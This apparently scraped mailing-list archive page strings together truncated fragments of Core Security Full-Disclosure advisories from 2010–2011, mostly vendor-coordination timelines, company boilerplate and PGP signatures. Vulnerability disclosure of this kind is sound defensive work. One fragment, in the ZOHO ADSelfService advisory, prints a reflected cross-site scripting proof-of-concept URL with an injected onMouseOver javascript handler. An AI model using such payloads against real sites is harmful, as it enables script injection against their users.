.org/licenses/by-nc-sa/3.0/us 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9 =oV7u -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities
by following a link to: /- http://SERVER/EmployeeSearch.cc?actionId=Search¶meterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29 -/ This reflection is not obvious at first sight, as the source code shown after the process is finished is the showList page source. This code can be easily viewed if captured on the wire using a proxy server, though. Additionally, since invoking 'http://SERVER/EmployeeSearch.cc?actionId=Search' causes a redirection to 'http://SERVER/EmployeeSearch.cc?actionId=showList', entering any data capable of triggering a vulnerability in the latter page can be introduced in the former with the same results. It is important to note that since the cross site scripting vulnerabilities were detected while investigating the authentication bypass issues and were considered a secondary matter, the pages containing them were not thoroughly tested. This leaves the possibility of other similar cross site scripting vulnerabilities remaining undetected. 9. *Report Timeline* . 2011-01-11: Initial notification to the vendor. Publication date set to February 2nd, 2011. . 2011-01-13: The Zoho team asks Core for a technical description of the vulnerability. . 2011-01-13: Technical details sent to Zoho team by Core. . 2011-01-17: The Zoho team acknowledges reception of advisory draft and asks a contact phone number to discuss these flaws. . 2011-01-17: The Core team notifies its preference for keeping the whole communication process through email, in order to track all interactions, and involve all those interested in: 1. the Core Security Advisories Team, 2. the Zoho team and, 3. the discoverer of the vulnerability. If there is something that cannot be resolved via email, Core team can eventually send a phone number to set up a conference call, but that is not necessary at the moment. . 2011-01-20: The Zoho team notifies that the vulnerabilities highlighted in the document will be addressed in the upcoming release of ADSelfService Plus, scheduled to be released before Feb. 11th. . 2011-01-21: Core notifies that the advisory was re-scheduled to Feb. 10th, and asks if any security bulleting is going to be released by Zoho team regarding these vulnerabilities. . 2011-01-28: The Zoho team notifies that they are on schedule for the release of the new version of ADSelfService Plus. Zoho have plans to publish a report regarding these vulnerabilities, including solutions and workarounds. . 2011-02-07: Core asks if Zoho team will be ready for disclosure next Thursday Feb 10th in order to coordinate the advisory publication. . 2011-02-08: The Zoho team notifies that they are ready with the Engineering Release version ADSelfService Plus 4.5 Build 4500. This version of ADSelfService Plus has taken into consideration and also addressed all security vulnerabilities highlighted by this advisory. Zoho is going to make a public announcement by Tomorrow. . 2011-02-10: The advisory CORE-2011-0103 is published. 10. *References* [1] ADSelfService Plus http://www.manageengine.com/products/self-service-password. [2] Manikandan.T, Senior Program Manager, ManageEngine ADSelfService Plus. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com/. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies
[Full-disclosure] [CORE-2010-1001] Cisco WebEx .atp and .wrf Overflow Vulnerabilities
netration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk1HJwcACgkQyNibggitWa13VwCfVg6jVkuv3PhqmhNqZFIQO7CB L1YAni1ONdRqEYczbkvki9r0Y7nr9cIQ =9HdA -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0728] Symantec Intel Handler Service Remote Denial-of-Service
d release date for the end of September. . 2010-08-27: Core agrees with the estimated release date, and requests the date of the initial report of the vulnerability. . 2010-09-09: After two weeks with no replies, Core again requests the date of the initial report of the vulnerability, and asks if the release of the fix is still on track for the end of September. . 2010-09-16: Vendor replies that they will not be able to release fixes before the end of the year, as they have to correct third-party code by themselves. . 2010-09-21: Core requests confirmation that the vendor won't release a fix before the end of the year. . 2010-09-22: Vendor confirms that they won't be able to release fixes until the end of the year, as fixing third-party code is taking time. However, the vendor explains that current versions of the product have the vulnerable functionality disabled, that old versions of the product do not install the vulnerable functionality by default, and that installation of this functionality is not recommended. . 2010-10-05: Core requests version numbers for vulnerable and non-vulnerable versions of the software, and asks if vulnerable users can update to a non-vulnerable version. . 2010-09-06: Vendor replies with the version numbers and confirms that vulnerable users have to wait for the patch. . 2010-10-07: Core decides to push the release date forward and wait for the release of the patch. . 2010-10-22: Core asks Symantec for a precise release date for the fixes, and explains that the publication of the advisory won't be pushed further than December 2010. . 2010-10-23: Vendor replies that the last known date was during December, and that they will confirm a firmer date. . 2010-11-01: Core asks Symantec if a firmer release date has been confirmed. . 2010-11-03: Vendor replies that the engineering team has not confirmed a release date, and asks if Core can hold the publication of the advisory until the end of the year. . 2010-11-25: Core replies that the December 13th release date is fixed, and requests an update on the status of the patches. . 2010-12-13: No update received, advisory CORE-2010-0728 is published. 10. *References* 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk0GR4UACgkQyNibggitWa1iKQCfYtzFZOnNGpclzNZEDrwM08wr gwsAn2UYlqC0+IpliLAVTn/ItK4Sc3ne =Up/o -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net
ical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-1018 - Landesk OS command injection
and also sends the workaround mentioned in the [Sec. 6]. . 2010-11-08: LANDesk team requests to postpone the advisory publication for 24hs given that they are unable to be ready by that time. . 2010-11-09: Core re-schedules the advisory publication to November 10th. . 2010-11-10: The advisory CORE-2010-1018 is published. 10. *References* [1] LANDesk website [http://www.landesk.com/]. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0825] Apple OS X ATSServer CFF CharStrings INDEX Sign Mismatch
f October without a firm date of publication. . 2010-08-31: Apple asks Core about credit information for the advisory. . 2010-09-28: Core acknowledges the comunication sending the credit information for this report. . 2010-10-20: Core asks Apple for a firm date for the release of this securiry issue since the initial propossed timeframe of October 18th is due. . 2010-10-22: Apple acknowledges the comunication informing that the publication date is scheduled to the week of October 25th. Also, Apple notifies that the assigned identifier for this vulnerability is CVE-2010-1797. . 2010-11-01: Core asks Apple for a new schedule for the publication, since there was no notice of any Apple security update during the week of October 25th. . 2010-11-01: Apple acknowledges the communication informing that the publication date was rescheduled to the middle of the week of November 1st. . 2010-11-03: Core informs Apple that the publication of this advisory was scheduled to Monday 8th, taking into account the last communication this is a final publication date. Core also informs that the information about how this vulnerability was found and how it can be exploited will be discussed in a small infosec related local event in Buenos Aires city. . 2010-11-08: Core publishes advisory CORE-2010-0825. 9. *References* [1] [http://en.wikipedia.org/wiki/PostScript_fonts#Compact_Font_Format] 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkzYayoACgkQyNibggitWa2PMgCfSvLwR5OgWfmFIwpONWL+dMa3 njEAnjIZFF+zG/wWK3IscWx3VyNW5F30 =XULv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0819] LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form
ge Maintainer for libsmi, informing that a bug has been found in libsmi. Core Security Technologies asks for a security contact in upstream stating that finding a reliable one using Google or looking at mailing lists was difficult. . 2010-09-06: Vincent Bernat, the Debian Package Maintainer for libsmi, replies with two e-mail of aledged developers of libsmi, Juergen Schoenwaelder and Frank Strauss. . 2010-09-07: Core Security Technologies contacts Juergen Schoenwaelder and Frank Strauss at their supplies e-mail addresses, telling about a found vulnerability and offering an advisory draft in either plain or encripted form. . 2010-09-07: Frank Strauss' e-mail address bounces Core Security Technologies' e-mail back, informing about a new e-mail address. Core Security Technologies sends the message again to the new address. . 2010-09-07: Juergen Schoenwaelder replies with his PGP keys, and copies Vincent Bernat again in the conversation. . 2010-09-09: Core Security Technologies sends and encripted draft of this advisory to Juergen Schoenwaelder and Vincent Bernat, with apologies due to the delay caused by Pedro Varangot [http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Pedro_Varangot] being on leave due to health issues. The advisory draft mentions Net-SNMP as possible vulnerabile software. . 2010-09-11: Juergen Schoenwaelder replies with a patch fixing the vulnerability, and correcting some tecnical information in the advisory draft regarding the impact of the vulnerability, stating that it is likely low and that Net-SNMP is not affected. . 2010-09-27: Core Security Technologies replies to Juergen Schoenwaelder and Vincent Bernat agreeing that the impact of the vulnerability is low and removes the mention of Net-SNMP in the avisory. Core Security Technologies asks for a timeline regarding the release of a fixed version of libsmi stating that this advisory will be released anyway, because someone may be using libsmi in his software introducing a vulnerability he may not know about. No reply is received for this e-mail. . 2010-10-04: Core Security Technologies notifies Juergen Schoenwaelder and Vincent Bernat that October the 18th has been set as a tentative release date for this advisory, and that the release date is open to discussion if commitment to release a fixed version of libsmi in a given timeframe is given. . 2010-10-08: Juergen Schoenwaelder replies with sugestions for the vulnerable packages and vendor information section of this advisory. He also mentions that Core Security Technologies should go with the October de 18th release date for this advisory. . 2010-10-08: Core Security Technologies incorporates Juergen Schoenwaelder's suggestions to the advisory, and again mentions that the advisory can be rescheduled if it is deemed necesary by the vendor. . 2010-10-20: Advisory CORE-2010-0819 is released. 10. *References* [1] [http://www.ibr.cs.tu-bs.de/projects/libsmi/] [2] [http://www.ibr.cs.tu-bs.de/projects/libsmi/libsmi.html] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the
[Full-disclosure] CORE-2010-0517 - Microsoft Office HtmlDlgHelper class memory corruption
nd included an invalid detail in the last status update. In particular, the issue does not affect the SafeHTML update scheduled for October but it will be shipping in the IE Cumulative Update scheduled for October. . 2010-10-01: Core acknowledges the MSRC's e-mail and notifies that although the problem is located in IE-owned code, the problem also affects Office up to 2010. Core assumes this will be specified in the MSRC bulletin and asks for confirmation. . 2010-10-04: MSRC confirms that the description of the vulnerability calls out that the vector to the vulnerability is through opening a word document. . 2010-10-12: Advisory CORE-2010-0517 is published. 9. *References* [1] Microsoft security bulletin summary for October 2010 - [http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx]. [2] Office killbit [http://support.microsoft.com/kb/983632]. [3] This bug was originally investigated in Microsoft Office by Core, but MSRC determined [2010-07-02] that this bug is an exploitable crash in Internet Explorer. [4] MSRC was not able to reproduce this issue on IE6, however they notifies the code has been determined to exist in this version and the fix will be scoped to address this platform as well. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0624] MS OpenType CFF Parsing Vulnerability
ed. . 2010-10-07: Core sends the draft advisory. . 2010-10-08: MSRC acknowledges the advisory text, and confirms that the vulnerability is locally exploitable. . 2010-10-12: Advisory CORE-2010-0624 is published. 10. *References* 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAky0jIYACgkQyNibggitWa2G7gCgndqT2EjZ7++mvRK6DzmKP4Rt tH0AoJ7mgNjoAdvCll0iRFI7QHRSG2wK =WNYa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability
problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://www.coresecurity.com/corelabs]. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkystXYACgkQyNibggitWa33EQCfT55LUL5PG2WUscpSikemiVeY yNMAnjhSH0EitGnENPDAbWJz3+JiZXPh =nN2s -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2010-0407: Microsoft Office Excel PivotTable Cache Data Record Buffer Overflow
rity Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkxhsvMACgkQyNibggitWa3SZQCeIQ9oxM48E4FXX2yxcKW+XFts 1jMAoKvDR2SVz6mTGp7S44g5s9AMQlx7 =Z2wt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0623] Microsoft Windows CreateWindow function callback vulnerability
uesday is due. Core also informs that reliable exploitation of this bug had been achieved and restates that August should be a final date because this vulnerability has probably been already discovered by any with technical knowledge to reverse engineer MS010-032. Information on affected platforms is also asked for to Microsoft. . 2010-07-23: Microsoft confirms that the patch will be issued in August 10th, for all supported versions of Microsoft Windows. . 2010-08-04: Core asks Microsoft for data regarding their future security bulletin in order to include it in the vendor section of this advisory. . 2010-08-04: Microsoft replies with the data Core asked for, and mentions that, if possible, they would like to see an advisory draft. Microsoft also asks for confirmation on credits for the acknowledgement section of their report. . 2010-08-04: Core replies with a draft of this advisory and a minor correction regarding an accent mark on the credits for the acknowledgement section. . 2010-08-09: Core sends a more polished draft for the advisory. . 2010-08-10: Microsoft acknowledges the advisory draft and the minor correction regarding the accent mark. . 2010-08-10: Microsoft Security Bulletin MS10-048 is published. . 2010-08-10: Advisory CORE-2010-0623 is published. 10. *References* [1] Microsoft Security Bulletin MS10-032 [http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com/]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: GnuPT v3.6.3 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+ 37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+ =ECTt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ Adobe Director DIRAPI.DLL Invalid Read Vulnerability Additional research on this vulnerability was performed by Core Security Technologies researchers. Updated technical information has been published at: http://www.coresecurity.com/content/adobe-director-memory-corruption -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkxcU2UACgkQyNibggitWa2xrQCgo5BWGlgA8VC4drNpdLlNT4uX HdEAoJNiuBrGAt7eKMdhDhSmTIDNbvwx =hLcP -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CORE-2010-0608] HP OpenView NNM OvJavaLocale Buffer Overflow Vulnerability
